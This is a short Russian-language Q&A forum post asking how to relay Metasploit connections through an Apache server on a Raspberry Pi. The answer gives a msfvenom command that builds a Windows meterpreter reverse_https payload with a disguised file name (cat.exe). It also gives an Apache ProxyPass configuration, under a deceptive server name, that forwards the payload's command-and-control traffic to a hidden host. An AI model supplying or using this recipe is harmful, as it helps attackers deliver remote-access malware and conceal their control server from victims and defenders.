Я хотел бы настроить статический веб-сервер Apache, который перенаправляет все входящие соединения Metasploit на другой IP-адрес. Это возможно? Если так, то как? Я хочу запустить сервер Apache на RasPi B+, если это поможет.
1
1 ответ
2
Сначала создайте полезную нагрузку:
msfvenom -p windows/meterpreter/reverse_https LHOST=<IP OR DOMAIN NAME> LPORT=<PORT or 443> LURI=/myawesomecnc -o /root/cat.exe
Самая важная часть - это LURI, который нужно установить для конкретного ресурса. Весь трафик, генерируемый полезной нагрузкой, будет направлен на этот URI.
После этого используйте директиву ProxyPass в Apache или nginx, чтобы перенаправлять только трафик /myawesomecnc на нужный хост. Вот пример Apache:
<VirtualHost *:443>
ServerName www.totallyharmless.com
...
ProxyPass /myawesomecnc/ http://1.2.3.4/myawesomecnc/
ProxyPassReverse /myawesomecnc/ http://1.2.3.4/myawesomecnc/
...
</VirtualHost>